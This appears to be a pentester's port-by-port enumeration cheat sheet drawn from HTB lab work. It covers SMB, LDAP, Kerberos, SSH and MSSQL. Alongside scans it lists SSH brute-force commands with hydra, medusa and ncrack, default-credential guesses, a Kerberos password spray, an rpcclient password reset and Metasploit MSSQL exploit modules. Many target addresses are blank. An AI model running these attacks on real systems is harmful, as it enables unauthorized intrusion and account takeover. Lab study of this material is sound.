Comment on page

02 Port Enumeration

Port 21 - FTP

nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21

Port 22 - SSH

try to login with default/simple account : admin:admin, root:root, user:password
Brute Force
patator ssh_login host= port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://
medusa -h -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://

Port 25 - SMTP

nc -nvv 25
HELO foo<cr><lf>
telnet 25
VRFY root
nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25
smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t

Port 53 - DNS

dnsrecon -d

Port 88 - Kerberos

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'"
python -dc-ip -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt

Port 110 - Pop3

PASS abcd1234
USER fkclai
PASS abcd1234
# List all emails

Port 111 - Rpcbind

rpcinfo -p
rpcclient -U ""
#rpcclient $>srvinfo
#rpcclient $>enumdomusers
#rpcclient $>querydominfo
#rpcclient $>getdompwinfo //password policy
#rpcclient $>netshareenum
#rpcclient $>enumprivs
#rpcclient $>setuserinfo2 <user id> 23 abcd@1234

Port 135 - MSRPC

nmap --script=msrpc-enum -p 135 >> /tmp/rpc.txt

Port 139/445 - SMB

smbmap -H
smbmap -u "guest" -p "" -H
nmap --script smb-enum-shares -p 139,445
enum4linux nest.htb
smbclient -L nest.htb
smbclient -U "r.thompson" -L \\\\
smbclient -L // -N
# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445
nmap --script vuln -p 135,139,445
smbmap -u TempUser -p welcome2019 -H nest.htb -R
smbclient \\\\nest.htb\\Data -U TempUser
smbclient // -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
mask ""
recurse ON
prompt OFF
mget *

Port 389,636 LDAP

ldapsearch -h -p 389 -x -b "dc=fkclai,dc=com"
ldapsearch -x -h -D 'DOMAIN\fkclai' -w 'hash-password'
ldapdomaindump -u 'DOMAIN\fkclai' -p 'hash-password' -d abcde.local --dc-ip -U

Port 1433 MSSQL

nmap -p 1433 -sU --script=ms-sql-info.nse
#MSF payload
use auxiliary/scanner/mssql/mssql_ping
use auxiliary/scanner/mssql/mssql_login
use exploit/windows/mssql/mssql_payload